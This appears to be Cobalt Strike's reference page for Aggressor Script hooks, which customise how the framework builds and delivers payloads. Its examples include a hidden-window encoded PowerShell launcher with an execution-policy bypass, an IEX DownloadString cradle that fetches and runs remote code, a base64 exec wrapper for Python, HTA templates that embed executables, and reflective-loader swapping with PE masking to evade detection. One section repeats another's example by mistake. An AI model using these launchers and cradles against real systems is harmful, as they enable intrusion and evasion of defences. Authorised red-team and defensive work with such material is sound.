Navigation

Hooks

Hooks allow Aggressor Script to intercept and change Cobalt Strike behavior.

APPLET_SHELLCODE_FORMAT

Format shellcode before it's placed on the HTML page generated to serve the Signed or Smart Applet Attacks.

https://www.cobaltstrike.com/help-java-signed-applet-attack

Applet Kit

This hook is demonstrated in the Applet Kit. The Applet Kit is available via the Cobalt Strike Arsenal (Help -> Arsenal).

Example

set APPLET_SHELLCODE_FORMAT {
	return base64_encode($1);
}

BEACON_RDLL_GENERATE

Hook to allow users to replace the Cobalt Strike reflective loader in a beacon with a User Defined Reflective Loader. The reflective loader can be extracted from a compiled object file and plugged into the Beacon Payload DLL.

https://www.cobaltstrike.com/help-user-defined-reflective-loader

Arguments

$1 - Beacon payload file name
$2 - Beacon payload (dll binary)
$3 - Beacon architecture (x86/x64)

Returns

The Beacon executable payload updated with the User Defined reflective loader. Return $null to use the default Beacon executable payload.

Example

sub generate_my_dll {
	local('$handle $data $loader $temp_dll');

	# ---------------------------------------------------------------------
	# Load an Object File that contains a Reflective Loader.
	# The architecture ($3) is used in the path.
	# ---------------------------------------------------------------------
	# $handle = openf("/mystuff/Refloaders/bin/MyReflectiveLoader. $+ $3 $+ .o");
	$handle = openf("mystuff/Refloaders/bin/MyReflectiveLoader. $+ $3 $+ .o");

	$data   = readb($handle, -1);
	closef($handle);

	# warn("Object File Length: " . strlen($data));

	if (strlen($data) eq 0) {
		warn("Error loading reflective loader object file.");
		return $null;
	}

	# ---------------------------------------------------------------------
	# extract loader from BOF.
	# ---------------------------------------------------------------------
	$loader = extract_reflective_loader($data);

	# warn("Reflective Loader Length: " . strlen($loader));

	if (strlen($loader) eq 0) {
		warn("Error extracting reflective loader.");
		return $null;
	}

	# ---------------------------------------------------------------------
	# Replace the beacons default reflective loader with '$loader'.
	# ---------------------------------------------------------------------
	$temp_dll = setup_reflective_loader($2, $loader);

	# ---------------------------------------------------------------------
	# TODO: Additional Customization of the PE...
	# 	- Use 'pedump' function to get information for the updated DLL.
	# 	- Use these convenience functions to perform transformations on the DLL:
	# 		pe_remove_rich_header
	# 		pe_insert_rich_header
	# 		pe_set_compile_time_with_long
	# 		pe_set_compile_time_with_string
	# 		pe_set_export_name
	# 		pe_update_checksum
	# 	- Use these basic functions to perform transformations on the DLL:
	# 		pe_mask
	# 		pe_mask_section
	# 		pe_mask_string
	# 		pe_patch_code
	# 		pe_set_string
	# 		pe_set_stringz
	# 		pe_set_long
	# 		pe_set_short
	# 		pe_set_value_at
	# 		pe_stomp
	# ---------------------------------------------------------------------

	# ---------------------------------------------------------------------
	# Give back the updated beacon DLL.
	# ---------------------------------------------------------------------
	return $temp_dll;
}

# ------------------------------------
# $1 = DLL file name
# $2 = DLL content
# $3 = arch
# ------------------------------------
set BEACON_RDLL_GENERATE {
	warn("Running 'BEACON_RDLL_GENERATE' for DLL " . $1 . " with architecture " . $3);
	return generate_my_dll($1, $2, $3);
}

BEACON_RDLL_GENERATE_LOCAL

The BEACON_RDLL_GENERATE_LOCAL hook is very similar to BEACON_RDLL_GENERATE with additional arguments.

See: BEACON_RDLL_GENERATE hook

Arguments

$1 - Beacon payload file name
$2 - Beacon payload (dll binary)
$3 - Beacon architecture (x86/x64)
$4 - Parent beacon ID
$5 - GetModuleHandleA pointer
$6 - GetProcAddress pointer

Example

# ------------------------------------
# $1 = DLL file name
# $2 = DLL content
# $3 = arch
# $4 = parent Beacon ID
# $5 = GetModuleHandleA pointer
# $6 = GetProcAddress pointer
# ------------------------------------
set BEACON_RDLL_GENERATE_LOCAL {
	warn("Running 'BEACON_RDLL_GENERATE_LOCAL' for DLL " . $1 . " with architecture " . $3 . " Beacon ID " . $4 . " GetModuleHandleA " . $5 . " GetProcAddress " . $6);
	return generate_my_dll($1, $2, $3);
}

Also See

&BEACON_RDLL_GENERATE

BEACON_SLEEP_MASK

Update a Beacon payload with a User Defined Sleep Mask

Arguments

$1 - beacon type (default, smb, tcp)
$2 - arch

Sleep Mask Kit

This hook is demonstrated in the Sleep Mask Kit:

https://www.cobaltstrike.com/help-sleep-mask-kit

EXECUTABLE_ARTIFACT_GENERATOR

Control the EXE and DLL generation for Cobalt Strike.

Arguments

$1 - the artifact file (e.g., artifact32.exe)
$2 - shellcode to embed into an EXE or DLL

Artifact Kit

This hook is demonstrated in the Artifact Kit:

https://www.cobaltstrike.com/help-artifact-kit

HTMLAPP_EXE

Controls the content of the HTML Application User-driven (EXE Output) generated by Cobalt Strike.

Arguments

$1 - the EXE data
$2 - the name of the .exe

Resource Kit

This hook is demonstrated in the Resource Kit:

https://www.cobaltstrike.com/help-resource-kit

Example

set HTMLAPP_EXE {
	local('$handle $data');
	$handle = openf(script_resource("template.exe.hta"));
	$data   = readb($handle, -1);
	closef($handle);

	$data   = strrep($data, '##EXE##', transform($1, "hex"));
	$data   = strrep($data, '##NAME##', $2);

	return $data;
}

HTMLAPP_POWERSHELL

Controls the content of the HTML Application User-driven (PowerShell Output) generated by Cobalt Strike.

Arguments

$1 - the PowerShell command to run

Resource Kit

This hook is demonstrated in the Resource Kit:

https://www.cobaltstrike.com/help-resource-kit

Example

set HTMLAPP_POWERSHELL {
	local('$handle $data');
	$handle = openf(script_resource("template.psh.hta"));
	$data   = readb($handle, -1);
	closef($handle);
	
	# push our command into the script
	return strrep($data, "%%DATA%%", $1);
}

POWERSHELL_COMMAND

Change the form of the powershell comamnd run by Cobalt Strike's automation. This affects jump psexec_psh, powershell, and [host] -> Access -> One-liner.

Arguments

$1 - the PowerShell command to run.
$2 - true|false the command is run on a remote target.

Resource Kit

This hook is demonstrated in the Resource Kit:

https://www.cobaltstrike.com/help-resource-kit

Example

set POWERSHELL_COMMAND {
	local('$script');
	$script = transform($1, "powershell-base64");
	
	# remote command (e.g., jump psexec_psh)
	if ($2) {
		return "powershell -nop -w hidden -encodedcommand $script";
	}
	# local command
	else {
		return "powershell -nop -exec bypass -EncodedCommand $script";
	}
}

POWERSHELL_COMPRESS

A hook used by the resource kit to compress a PowerShell script. The default uses gzip and returns a deflator script.

Resource Kit

This hook is demonstrated in the Resource Kit:

https://www.cobaltstrike.com/help-resource-kit

Arguments

$1 - the script to compress

POWERSHELL_DOWNLOAD_CRADLE

Change the form of the PowerShell download cradle used in Cobalt Strike's post-ex automation. This includes jump winrm|winrm64, [host] -> Access -> One Liner, and powershell-import.

Arguments

$1 - the URL of the (localhost) resource to reach

Resource Kit

This hook is demonstrated in the Resource Kit:

https://www.cobaltstrike.com/help-resource-kit

Example

set POWERSHELL_DOWNLOAD_CRADLE {
	return "IEX (New-Object Net.Webclient).DownloadString(' $+ $1 $+ ')";
}

PSEXEC_SERVICE

Set the service name used by jump psexec|psexec64|psexec_psh and psexec.

Example

set PSEXEC_SERVICE {
	return "foobar";
}

PYTHON_COMPRESS

Compress a Python script generated by Cobalt Strike.

Arguments

$1 - the script to compress

Resource Kit

This hook is demonstrated in the Resource Kit:

https://www.cobaltstrike.com/help-resource-kit

Example

set PYTHON_COMPRESS {
	return "import base64; exec base64.b64decode(\"" . base64_encode($1) . "\")";
}

RESOURCE_GENERATOR

Control the format of the VBS template used in Cobalt Strike.

Resource Kit

This hook is demonstrated in the Resource Kit:

https://www.cobaltstrike.com/help-resource-kit

Arguments

$1 - the shellcode to inject and run

RESOURCE_GENERATOR_VBS

Controls the content of the HTML Application User-driven (EXE Output) generated by Cobalt Strike.

Arguments

$1 - the EXE data
$2 - the name of the .exe

Resource Kit

This hook is demonstrated in the Resource Kit:

https://www.cobaltstrike.com/help-resource-kit

Example

set HTMLAPP_EXE {
	local('$handle $data');
	$handle = openf(script_resource("template.exe.hta"));
	$data   = readb($handle, -1);
	closef($handle);

	$data   = strrep($data, '##EXE##', transform($1, "hex"));
	$data   = strrep($data, '##NAME##', $2);

	return $data;
}

SIGNED_APPLET_MAINCLASS

Specify the MAIN class of the Java Signed Applet Attack.

https://www.cobaltstrike.com/help-java-signed-applet-attack

Applet Kit

This hook is demonstrated in the Applet Kit. The Applet Kit is available via the Cobalt Strike Arsenal (Help -> Arsenal).

Example

set SIGNED_APPLET_MAINCLASS {
	return "Java.class";
}

SIGNED_APPLET_RESOURCE

Specify a Java Applet file to use for the Java Signed Applet Attack.

https://www.cobaltstrike.com/help-java-signed-applet-attack

Applet Kit

This hook is demonstrated in the Applet Kit. The Applet Kit is available via the Cobalt Strike Arsenal (Help -> Arsenal).

Example

set SIGNED_APPLET_RESOURCE {
	return script_resource("dist/applet_signed.jar");
}

SMART_APPLET_MAINCLASS

Specify the MAIN class of the Java Smart Applet Attack.

https://www.cobaltstrike.com/help-java-smart-applet-attack

Applet Kit

This hook is demonstrated in the Applet Kit. The Applet Kit is available via the Cobalt Strike Arsenal (Help -> Arsenal).

Example

set SMART_APPLET_MAINCLASS {
	return "Java.class";
}

SMART_APPLET_RESOURCE

Specify a Java Applet file to use for the Java Smart Applet Attack

https://www.cobaltstrike.com/help-java-smart-applet-attack

Applet Kit

This hook is demonstrated in the Applet Kit. The Applet Kit is available via the Cobalt Strike Arsenal (Help -> Arsenal).

Example

set SMART_APPLET_RESOURCE {
	return script_resource("dist/applet_rhino.jar");
}